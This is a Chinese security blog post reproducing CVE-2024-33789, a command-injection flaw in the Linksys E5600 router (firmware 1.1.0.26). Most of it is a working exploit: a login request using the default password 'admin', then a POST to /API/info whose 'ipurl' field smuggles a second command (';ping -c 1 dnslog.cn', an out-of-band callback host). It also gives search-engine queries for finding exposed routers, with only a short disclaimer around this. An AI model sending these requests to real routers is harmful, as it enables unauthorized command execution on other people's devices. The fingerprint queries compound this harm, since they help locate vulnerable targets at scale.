Linksys E5600路由器 任意命令执行漏洞 CVE-2024-33789

Linksys E5600路由器 任意命令执行漏洞 CVE-2024-33789

年轮
2024-05-08 / 0 评论 / 25 阅读 / 正在检测是否收录...

免责声明

Aiy Blog(本博客)的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

漏洞名称

Linksys E5600路由器 任意命令执行漏洞 CVE-2024-33789

漏洞复现

1、无需输入账号,默认密码为 admin

2、发送登录请求,提取返回信息Set-Cookie中的内容

POST /cgi-bin/login.cgi HTTP/1.1
Host: 1.1.1.1

{"username":"YWRtaW4=","password":"{{base64enc(admin)}}","token":"","source":"web","cn":"","action":"auth"}

3、替换Host、Referer、Cookie、需要执行的命令,发送请求

POST /API/info HTTP/1.1
Host: 1.1.1.1
Referer: http://1.1.1.1
Content-Type: application/json
Cookie: HSESSIONID=

{"pingTest":{"ipurl":"1.1.1.1;ping -c 1 dnslog.cn","pkgsize":"32","count":"5"}}

搜索语句

body="dlg=wz"&&title="Router Access"

product.name="Linksys E5600 Router"

利用条件

Linksys E5600 固件版本 = 1.1.0.26

禁止用于违法途径
本文共 221 个字数,平均阅读时长 ≈ 1分钟
0

打赏

海报

正在生成.....

评论 (0)

语录
取消